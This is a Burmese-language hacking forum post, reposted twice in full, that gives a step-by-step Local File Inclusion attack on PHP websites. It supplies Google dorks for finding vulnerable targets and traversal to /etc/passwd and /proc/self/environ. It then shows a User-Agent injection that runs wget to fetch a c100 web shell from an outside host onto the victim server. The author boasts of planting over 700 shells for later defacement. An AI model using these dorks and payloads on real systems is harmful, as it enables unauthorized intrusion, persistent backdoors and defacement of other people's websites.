LFI Local File Inclusion ေလး အေၾကာင္းေျပာခ်င္ပါတယ္ ညီကိုတို႔.... Online မွာ LFI ေပါက္ေနတဲ့ဆိုက္ေတြ သန္းခ်ီပီးရွိေနပါတယ္.... Web Hacking ေတြထဲကမွ ကၽြန္ေတာ္ အရသာအေတြ႔ဆံုးေလးပါ.... ဟီးဟီး... ဟဘာလို႔ အရသာေတြ႔တာလဲကြ... လို႔ေမးစရာျဖစ္ေတာ့မယ္.... ေျပာျပပါမယ္....
Web Hacking မွာ နံမယ္ႀကီးတာေတာ့
XSS (Cross Site Scripting)
နံမယ္ကေတာ့ လွတယ္.... ခက္တာလား ရွားတာလားေတာ့ မေသခ်ာဘူး... ေတြ႔ရခဲတယ္ ခင္ဗ်.... ေတာ္ေတာ္ ဆရာက်တဲ့ ဟက္ကာေတြ လုပ္ထားတဲ့ XSS ေတာ့ ေတြ႔ဖူးပါတယ္.... ေနာက္မွ ပို႔စ္ အသစ္တင္ေပးဦးမယ္...
SQLi (SQL Injection Attack)
ကေလးေတာင္ လုပ္တတ္တယ္ခင္ဗ်ာ..... Havij လို GUI tool မ်ိဳးနဲ႔ ထိုင္လုပ္ ေနၾကပါတယ္.... MD5/Admin Page ေတြ မွာတစ္ေနတာလဲ အမ်ားႀကီး... ဟီး.... သူ႔ကိုလဲ အထင္ေသးလို႔ေတာ့မရပါဘူး ခင္ဗ်ာ... တကယ့္ဆရာက်တဲ့ နည္းလမ္းေတြရွိေသးတာေပါ့.... Havij နဲ႔လုပ္တာေလာက္ကေတာ့ Basic ေပါ့ဗ်ာ... Back Track လို OS ေတြနဲ႔ေပါ့...
ထားပါ.... အဲ့ေလာက္ မတတ္ေသးဘူး.... ဟီးဟီးဟီး....
RFI/LFI အဲ.... လာပါပီ... ေျပာခ်င္တာေလး လာပါပီ.....
ြRFI ေပါက္တယ္ဆိုတာ ရွားပါတယ္.... LFI ေပါက္တာကေတာ့ SQLI နီးနီးပါပဲ....
RFI မွာ SHELL တင္စရာမလိုပါဘူး.... LFI မွာ SHELL တင္ရတာ အရသာရွိပါတယ္.... web hacker တေယာက္အတြက္အရသာဟာ SHELL တင္တဲ့ေနရာမွာပဲရွိတာလို႔ထင္ပါတယ္.... မရမက SHELL တင္ပီး SHELL Window ႀကီမ်ား တက္လာလို႔ကေတာ့ ေပ်ာ္လိုက္တဲ့ ျဖစ္ခ်င္း....
RFI ေတြ႔ခဲ့တယ္ဆိုရင္ေတာင္ CHMOD 777 ရခဲပါတယ္... LFI ကေတာ့ SHELL Access ျဖစ္ပီေဟ့ဆိုတာနဲ႔ CHMOD 777 ကေသခ်ာသေလာက္ပါပဲ... ဆိုေတာ့ လုပ္ခ်င္တာသာလုပ္ေတာ့ပဲ..... ဟီး.....
ကဲကဲ စကားေတြမမ်ားေတာ့ဘူး..... စၾကမယ္ LFI
GOOGLE DORK FOR LFI
-----------------------------
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
အဲ့ဒီ Dork ေလးေတြနဲ႔ google မွာရွာၾကည့္ပါ..... ကၽြန္ေတာ္ တခုေရြးလိုက္ပါမယ္... ေအာက္မွာၾကည့္ပါ

ေရြးထားတဲ့ လင့္ကို သြားပါမယ္.....

ပံုမွာျပထားတဲ့ php file ေနရာမွာ ../../etc/passwd ကိုအစားထိုးၾကည့္ပါ...

အဲပံုမွာေတြ႔ရသလို root:root စတာေတြက်လာတာေတြ႔ရင္ေတာ့ ေသခ်ာပီ LFI ေပါက္ေနပါပီ.... ကၽြန္ေတာ္တို႔ SHELL တင္ႏိုင္ဖို႔..... /proc/self/environ ဆိုတဲ့ method ဖြင့္ထားလားဆိုတာ စစ္ၾကည့္ရပါမယ္.... /etc/passwd ေနရာမွာ /proc/self/environ ဆိုတာ အစားထိုးထည့္ၾကည့္ပါ..... ေအာက္ကလို DOCUMENT_ROOT ေအာက္ေရာက္သြားပီဆိုရင္ေတာ့ Shell တင္လို႔ရပါပီ....

SHELL တင္ဖို႔တြက္ ကၽြန္ေတာ္တို႔
Temper Data Addon (or) User Agent Switcher ကိုသံုးရပါမယ္.... ခုေတာ့ Tamperdata Addon နဲ႔ျပပါမယ္.....

ကၽြန္ေတာ္တို႔ Tamper ကို start လုပ္ပီး page ကို reload လုပ္လိုက္ရင္ ေအာက္ကပံုေတြလို အဆင့္ဆင့္ က်လာပါမယ္....

ပီးရင္ေတာ့ User Agent ဆိုတဲ့ေနရာမွာ ရွိတဲ့စာေတြဖ်က္ပီး Command ေလးတေၾကာင္းထည့္ရပါမယ္ဗ်ား......
<? system('wget http://site.com/shell.txt -O shell.php'); ?>
အဲ့ဒါကေတာ့ သူ႔ Logic ေပါ့ဗ်ာ.... ကၽြန္ေတာ္ရွာထားပီးသား .txt shell က
http://www.sh3ll.org/c100.txt
ဆိုေတာ့.. ေအာက္ကလို ထည့္လိုက္ပါ....
<? system('wget http://www.sh3ll.org/c100.txt -O c.php'); ?>
ပီးရင္ ok ႏွိပ္.... အဲ... အကုန္အဆင္ေျပရင္ေတာ့ ခင္ဗ်ား shell က...
http://target.com/shell.php ကၽြန္ေတာ္ျပထားတာဆိုရင္ေတာ့ c.php ေပါ့ဗ်ာ.... အဲ့ခ်ိန္မွာ ရလိုက္တဲ့ အရသာေလး.. လုပ္ၾကည့္ပီးေျပာဦး.... ဟတ္ဟတ္ဟတ္ဟတ္......

Deface မလုပ္ၾကပါနဲ႔..... Deface လုပ္လိုက္ရင္ ေနာက္ေလ့လာသူေတြ လုပ္မရပဲေနမယ္... ခုပံုထဲက ဆိုက္ကိုေျပာတာပါ......
ကၽြန္ေတာ္ကေတာ့ Shell 700 ေက်ာ္ Upload လုပ္ထားပီးပါပီ.... လိုတဲ့ခ်ိန္မွ Deface ရေအာင္လို႔..... ခစ္ခစ္...... ေအာ္.. ေအာက္မွာ RFI လို႔ထင္ရေပမယ့္ RFI မဟုတ္တဲ့ iFrame ဆိုက္ေတြ တင္ေပးလိုက္တယ္.... အဲ့လို RFI နဲ႔ တခါတေလ ေရာတတ္လို႔...... ေပ်ာ္ရႊင္စြာ Security ကို ကာကြယ္ႏိုင္ၾကပါေစဗ်ာ.....
H4rdc0r3 H4ck3r - BHG
I am not professional Hacker!!
h4rdcore.h4cker@gmail.com
Read original post @ http://myanmarhackersuniversity.wall.fm ... z1n1xkYWz7
MHU မွာ တင္ခဲ႔ဖူးတဲ႔ hardcore ရဲ႔ LFI Attack Post ကို တစ္လံုးမ်က်န္ျပန္လည္ကူးယူတင္ျပျခင္း ျဖစ္ပါသည္ခင္ဗ်ာ...

Web Hacking မွာ နံမယ္ႀကီးတာေတာ့
XSS (Cross Site Scripting)
နံမယ္ကေတာ့ လွတယ္.... ခက္တာလား ရွားတာလားေတာ့ မေသခ်ာဘူး... ေတြ႔ရခဲတယ္ ခင္ဗ်.... ေတာ္ေတာ္ ဆရာက်တဲ့ ဟက္ကာေတြ လုပ္ထားတဲ့ XSS ေတာ့ ေတြ႔ဖူးပါတယ္.... ေနာက္မွ ပို႔စ္ အသစ္တင္ေပးဦးမယ္...
SQLi (SQL Injection Attack)
ကေလးေတာင္ လုပ္တတ္တယ္ခင္ဗ်ာ..... Havij လို GUI tool မ်ိဳးနဲ႔ ထိုင္လုပ္ ေနၾကပါတယ္.... MD5/Admin Page ေတြ မွာတစ္ေနတာလဲ အမ်ားႀကီး... ဟီး.... သူ႔ကိုလဲ အထင္ေသးလို႔ေတာ့မရပါဘူး ခင္ဗ်ာ... တကယ့္ဆရာက်တဲ့ နည္းလမ္းေတြရွိေသးတာေပါ့.... Havij နဲ႔လုပ္တာေလာက္ကေတာ့ Basic ေပါ့ဗ်ာ... Back Track လို OS ေတြနဲ႔ေပါ့...
ထားပါ.... အဲ့ေလာက္ မတတ္ေသးဘူး.... ဟီးဟီးဟီး....
RFI/LFI အဲ.... လာပါပီ... ေျပာခ်င္တာေလး လာပါပီ.....
ြRFI ေပါက္တယ္ဆိုတာ ရွားပါတယ္.... LFI ေပါက္တာကေတာ့ SQLI နီးနီးပါပဲ....
RFI မွာ SHELL တင္စရာမလိုပါဘူး.... LFI မွာ SHELL တင္ရတာ အရသာရွိပါတယ္.... web hacker တေယာက္အတြက္အရသာဟာ SHELL တင္တဲ့ေနရာမွာပဲရွိတာလို႔ထင္ပါတယ္.... မရမက SHELL တင္ပီး SHELL Window ႀကီမ်ား တက္လာလို႔ကေတာ့ ေပ်ာ္လိုက္တဲ့ ျဖစ္ခ်င္း....
RFI ေတြ႔ခဲ့တယ္ဆိုရင္ေတာင္ CHMOD 777 ရခဲပါတယ္... LFI ကေတာ့ SHELL Access ျဖစ္ပီေဟ့ဆိုတာနဲ႔ CHMOD 777 ကေသခ်ာသေလာက္ပါပဲ... ဆိုေတာ့ လုပ္ခ်င္တာသာလုပ္ေတာ့ပဲ..... ဟီး.....
ကဲကဲ စကားေတြမမ်ားေတာ့ဘူး..... စၾကမယ္ LFI
GOOGLE DORK FOR LFI
-----------------------------
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
အဲ့ဒီ Dork ေလးေတြနဲ႔ google မွာရွာၾကည့္ပါ..... ကၽြန္ေတာ္ တခုေရြးလိုက္ပါမယ္... ေအာက္မွာၾကည့္ပါ
ေရြးထားတဲ့ လင့္ကို သြားပါမယ္.....
ပံုမွာျပထားတဲ့ php file ေနရာမွာ ../../etc/passwd ကိုအစားထိုးၾကည့္ပါ...
အဲပံုမွာေတြ႔ရသလို root:root စတာေတြက်လာတာေတြ႔ရင္ေတာ့ ေသခ်ာပီ LFI ေပါက္ေနပါပီ.... ကၽြန္ေတာ္တို႔ SHELL တင္ႏိုင္ဖို႔..... /proc/self/environ ဆိုတဲ့ method ဖြင့္ထားလားဆိုတာ စစ္ၾကည့္ရပါမယ္.... /etc/passwd ေနရာမွာ /proc/self/environ ဆိုတာ အစားထိုးထည့္ၾကည့္ပါ..... ေအာက္ကလို DOCUMENT_ROOT ေအာက္ေရာက္သြားပီဆိုရင္ေတာ့ Shell တင္လို႔ရပါပီ....
SHELL တင္ဖို႔တြက္ ကၽြန္ေတာ္တို႔
Temper Data Addon (or) User Agent Switcher ကိုသံုးရပါမယ္.... ခုေတာ့ Tamperdata Addon နဲ႔ျပပါမယ္.....
ကၽြန္ေတာ္တို႔ Tamper ကို start လုပ္ပီး page ကို reload လုပ္လိုက္ရင္ ေအာက္ကပံုေတြလို အဆင့္ဆင့္ က်လာပါမယ္....
ပီးရင္ေတာ့ User Agent ဆိုတဲ့ေနရာမွာ ရွိတဲ့စာေတြဖ်က္ပီး Command ေလးတေၾကာင္းထည့္ရပါမယ္ဗ်ား......
<? system('wget http://site.com/shell.txt -O shell.php'); ?>
အဲ့ဒါကေတာ့ သူ႔ Logic ေပါ့ဗ်ာ.... ကၽြန္ေတာ္ရွာထားပီးသား .txt shell က
http://www.sh3ll.org/c100.txt
ဆိုေတာ့.. ေအာက္ကလို ထည့္လိုက္ပါ....
<? system('wget http://www.sh3ll.org/c100.txt -O c.php'); ?>
ပီးရင္ ok ႏွိပ္.... အဲ... အကုန္အဆင္ေျပရင္ေတာ့ ခင္ဗ်ား shell က...
http://target.com/shell.php ကၽြန္ေတာ္ျပထားတာဆိုရင္ေတာ့ c.php ေပါ့ဗ်ာ.... အဲ့ခ်ိန္မွာ ရလိုက္တဲ့ အရသာေလး.. လုပ္ၾကည့္ပီးေျပာဦး.... ဟတ္ဟတ္ဟတ္ဟတ္......
Deface မလုပ္ၾကပါနဲ႔..... Deface လုပ္လိုက္ရင္ ေနာက္ေလ့လာသူေတြ လုပ္မရပဲေနမယ္... ခုပံုထဲက ဆိုက္ကိုေျပာတာပါ......
ကၽြန္ေတာ္ကေတာ့ Shell 700 ေက်ာ္ Upload လုပ္ထားပီးပါပီ.... လိုတဲ့ခ်ိန္မွ Deface ရေအာင္လို႔..... ခစ္ခစ္...... ေအာ္.. ေအာက္မွာ RFI လို႔ထင္ရေပမယ့္ RFI မဟုတ္တဲ့ iFrame ဆိုက္ေတြ တင္ေပးလိုက္တယ္.... အဲ့လို RFI နဲ႔ တခါတေလ ေရာတတ္လို႔...... ေပ်ာ္ရႊင္စြာ Security ကို ကာကြယ္ႏိုင္ၾကပါေစဗ်ာ.....
H4rdc0r3 H4ck3r - BHG
I am not professional Hacker!!
h4rdcore.h4cker@gmail.com
Read original post @ http://myanmarhackersuniversity.wall.fm ... z1n1xkYWz7
MHU မွာ တင္ခဲ႔ဖူးတဲ႔ hardcore ရဲ႔ LFI Attack Post ကို တစ္လံုးမ်က်န္ျပန္လည္ကူးယူတင္ျပျခင္း ျဖစ္ပါသည္ခင္ဗ်ာ...


